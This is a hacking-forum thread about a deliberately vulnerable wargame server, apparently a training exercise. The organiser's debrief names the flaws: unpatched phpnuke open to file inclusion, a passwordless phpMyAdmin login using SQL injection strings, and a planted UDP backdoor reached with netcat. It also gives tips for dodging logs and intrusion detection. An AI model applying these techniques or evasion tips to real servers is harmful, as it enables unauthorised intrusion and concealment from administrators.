oh and sorry I ssh your host at first.
don't ask.
Dec. 15: new wargame started!
Wargames Continuation
Hey all was just thinking...
I am wondering if everyone is interested in having a dedicated wargames box here. Was thinking I could keep that server going as my donation to suck-o and we could get some people to aid in setting up different games.
the server is only like 15 dollars per month or 10 or something like that
If people are interested and we can get some dedicated people familiar with Linux to assist in setting up different games So bb isn't stuck doing it
And there is enough interest
I would be more than happy to do this
Let me know
AND WELL DONE TO BSD
I am wondering if everyone is interested in having a dedicated wargames box here. Was thinking I could keep that server going as my donation to suck-o and we could get some people to aid in setting up different games.
the server is only like 15 dollars per month or 10 or something like that
If people are interested and we can get some dedicated people familiar with Linux to assist in setting up different games So bb isn't stuck doing it
And there is enough interest
I would be more than happy to do this
Let me know
AND WELL DONE TO BSD
-
bad_brain
- Site Owner
- Posts: 11636
- Joined: 06 Apr 2005, 16:00
- 19
- Location: In your eye floaters.
- Contact:
ok, here are the flaws the server had:
- the phpnuke installation was an unpatched old version (7.5), remote file inclusions would have been possible (most likely XSS and SQL injections too), for such issues checking sites like http://www.securityfocus.com is the key.
- Phpmyadmin was installed in its default place (http://sitename.com/phpmyadmin), but no password was set for mysql. this flaw is not even rare, because when installing mysql no password is set by default. MariaLara found this flaw too, she logged in with 1=1-- as username and no password (it would also have been possible to login as user "root" with no password, this is the default).
- the last flaw was a nasty one, the scenario was: "maybe I am not the first one trying to compromise the server, what if someone was successful already?" so I placed a Perl script in the root directory which opened a backdoor. so it was possible to spawn a shell by connecting to port 520 UDP, the best tool for connecting to such backdoors is netcat.
netcat is originally for Unix/Linux, but a Windows port is also available.
MariaLara found this backdoor and used netcat to connect, she created even a new user, and finally she used it to leave the BSDGurl_was_here message....this all is a clear evidence that she had 100% root permissions and the server was completely under her control.
all of the flaws were realistic, and there are more than enough servers in the wild that could be rooted in those ways.
without an IDS the backdoor was the most stealth way, because UDP is a non-connective protocol (no 3-way handshake as with TCP, this was the "server will never welcome you with a handshake" hint btw), and so no log entries are made in daemon.log or auth.log
the other 2 flaws would leave entries in the apache access log, but using a good proxy would make the entries pointless.
if an IDS is running, the backdoor connection would have been noticed, also the RFI attempts, so the most stealth way in this case would have been through Phpmyadmin.
so, things to remember are:
- check for known flaws of running service or platforms like Phpnuke, Wordpress, etc.
- if the server admin is good port scans are noticed anyway, don't matter if you scan 10 ports or all of them....so IF you run a scan make sure you will get all possible info with 1 scan, this will most likely be judged as automated script scan or onetime skiddie attempt, 10 small scans in opposite look much more suspicious.
I am not sure yet if I will have time to set up a new wargame before the server is taken offline by the host on the end of the month, my sister arrived today so it's family time....I will keep you up to date and post instantly here then...
- the phpnuke installation was an unpatched old version (7.5), remote file inclusions would have been possible (most likely XSS and SQL injections too), for such issues checking sites like http://www.securityfocus.com is the key.
- Phpmyadmin was installed in its default place (http://sitename.com/phpmyadmin), but no password was set for mysql. this flaw is not even rare, because when installing mysql no password is set by default. MariaLara found this flaw too, she logged in with 1=1-- as username and no password (it would also have been possible to login as user "root" with no password, this is the default).
- the last flaw was a nasty one, the scenario was: "maybe I am not the first one trying to compromise the server, what if someone was successful already?" so I placed a Perl script in the root directory which opened a backdoor. so it was possible to spawn a shell by connecting to port 520 UDP, the best tool for connecting to such backdoors is netcat.
netcat is originally for Unix/Linux, but a Windows port is also available.
MariaLara found this backdoor and used netcat to connect, she created even a new user, and finally she used it to leave the BSDGurl_was_here message....this all is a clear evidence that she had 100% root permissions and the server was completely under her control.
all of the flaws were realistic, and there are more than enough servers in the wild that could be rooted in those ways.
without an IDS the backdoor was the most stealth way, because UDP is a non-connective protocol (no 3-way handshake as with TCP, this was the "server will never welcome you with a handshake" hint btw), and so no log entries are made in daemon.log or auth.log
the other 2 flaws would leave entries in the apache access log, but using a good proxy would make the entries pointless.
if an IDS is running, the backdoor connection would have been noticed, also the RFI attempts, so the most stealth way in this case would have been through Phpmyadmin.
so, things to remember are:
- check for known flaws of running service or platforms like Phpnuke, Wordpress, etc.
- if the server admin is good port scans are noticed anyway, don't matter if you scan 10 ports or all of them....so IF you run a scan make sure you will get all possible info with 1 scan, this will most likely be judged as automated script scan or onetime skiddie attempt, 10 small scans in opposite look much more suspicious.
I am not sure yet if I will have time to set up a new wargame before the server is taken offline by the host on the end of the month, my sister arrived today so it's family time....I will keep you up to date and post instantly here then...
LMFAO I know you did. I was so pissed.Nerdz wrote:Congratulation Maria!:D At least something you succeed in... BECAUSE I FU*KING PWN YOU
I could give you a list of excuses but I won't as I talked so much trash I deserved getting my ass handed to me.
Anyways to everyone in here Nerdz totally beat my ass in SSBB. Every game. I don't think I even came close to winning one. hahahahahaha
*sigh*
It was great though. Let me practice when I am feeling better and then we will see.
The only true wisdom is in knowing you know nothing.
-
pseudo_opcode
- cyber messiah
- Posts: 1201
- Joined: 30 Apr 2006, 16:00
- 17
- Location: 127.0.0.1
err i was late again... i already made a "pwnd by pseudo" page after i found the phpnuke vuln..... but damn job.... i had other work to do.. when i resumed.. it was already rooted by BSD
i never thought about phpmyadmin(silly me, but correct me if i m wrong, isnt the default authentication method http?), anyway i assumed there would be no mysql pass so i tried to connect directly to 3306, but since default config file binds the server to localhost, so again i couldnt connect directly to server...
anyway i m sad i missed this one
but i m very happy to see the only active lady on suck-o to root it.. congrats BSD!
Mab: Man when you host the next wargame server, please let me know, i'll contribute 50% of fees, as an admin of suck-o thats the least i could do,
i think we should spice wargames up some more, play in teams,(like the older ones) and give points on hourly bases, the team who wins at the end of the week will get the prize(whatever it is), i already have the old scripts i wrote for hourly point calculation.
AFTER ALL THIS IS THE SHIT WE LIVE FOR!
we can also place some google ads or something on the servers so that server itself can pay for the hosting fee. lol just a thought.
and probably we can add an additional holes,so we could enjoy smashing the stack, and yeah probably some hashed passwords to crack, based on knowledge gained by social engineering..(from sources like imaginary site news archives, profile of current sysadmin).. you know that is the shit we got to do in real life...
[ok back to work]
i never thought about phpmyadmin(silly me, but correct me if i m wrong, isnt the default authentication method http?), anyway i assumed there would be no mysql pass so i tried to connect directly to 3306, but since default config file binds the server to localhost, so again i couldnt connect directly to server...
anyway i m sad i missed this one
but i m very happy to see the only active lady on suck-o to root it.. congrats BSD!Mab: Man when you host the next wargame server, please let me know, i'll contribute 50% of fees, as an admin of suck-o thats the least i could do,
i think we should spice wargames up some more, play in teams,(like the older ones) and give points on hourly bases, the team who wins at the end of the week will get the prize(whatever it is), i already have the old scripts i wrote for hourly point calculation.
AFTER ALL THIS IS THE SHIT WE LIVE FOR!
we can also place some google ads or something on the servers so that server itself can pay for the hosting fee. lol just a thought.
and probably we can add an additional holes,so we could enjoy smashing the stack, and yeah probably some hashed passwords to crack, based on knowledge gained by social engineering..(from sources like imaginary site news archives, profile of current sysadmin).. you know that is the shit we got to do in real life...
[ok back to work]
-
Still_Learning
- Fame ! Where are the chicks?!
- Posts: 1040
- Joined: 11 Jun 2008, 16:00
- 15
- Location: Trigger City
-
JuggaloMushroom
- Fame ! Where are the chicks?!
- Posts: 252
- Joined: 18 Jul 2006, 16:00
- 17
- Contact:
Damn I came real close, I didn't know that no password was the default though, so I kept putting 1=1'or'1'='1. hmm...I tried doing some stuff with netcat as well, I wasn't sure what else I would've done other than connect...too bad I gave up after like 10 attemptsbad_brain wrote:ok, here are the flaws the server had:
- the phpnuke installation was an unpatched old version (7.5), remote file inclusions would have been possible (most likely XSS and SQL injections too), for such issues checking sites like http://www.securityfocus.com is the key.
- Phpmyadmin was installed in its default place (http://sitename.com/phpmyadmin), but no password was set for mysql. this flaw is not even rare, because when installing mysql no password is set by default. MariaLara found this flaw too, she logged in with 1=1-- as username and no password (it would also have been possible to login as user "root" with no password, this is the default).
- the last flaw was a nasty one, the scenario was: "maybe I am not the first one trying to compromise the server, what if someone was successful already?" so I placed a Perl script in the root directory which opened a backdoor. so it was possible to spawn a shell by connecting to port 520 UDP, the best tool for connecting to such backdoors is netcat.
netcat is originally for Unix/Linux, but a Windows port is also available.
MariaLara found this backdoor and used netcat to connect, she created even a new user, and finally she used it to leave the BSDGurl_was_here message....this all is a clear evidence that she had 100% root permissions and the server was completely under her control.
all of the flaws were realistic, and there are more than enough servers in the wild that could be rooted in those ways.
without an IDS the backdoor was the most stealth way, because UDP is a non-connective protocol (no 3-way handshake as with TCP, this was the "server will never welcome you with a handshake" hint btw), and so no log entries are made in daemon.log or auth.log
the other 2 flaws would leave entries in the apache access log, but using a good proxy would make the entries pointless.
if an IDS is running, the backdoor connection would have been noticed, also the RFI attempts, so the most stealth way in this case would have been through Phpmyadmin.
so, things to remember are:
- check for known flaws of running service or platforms like Phpnuke, Wordpress, etc.
- if the server admin is good port scans are noticed anyway, don't matter if you scan 10 ports or all of them....so IF you run a scan make sure you will get all possible info with 1 scan, this will most likely be judged as automated script scan or onetime skiddie attempt, 10 small scans in opposite look much more suspicious.
I am not sure yet if I will have time to set up a new wargame before the server is taken offline by the host on the end of the month, my sister arrived today so it's family time....I will keep you up to date and post instantly here then...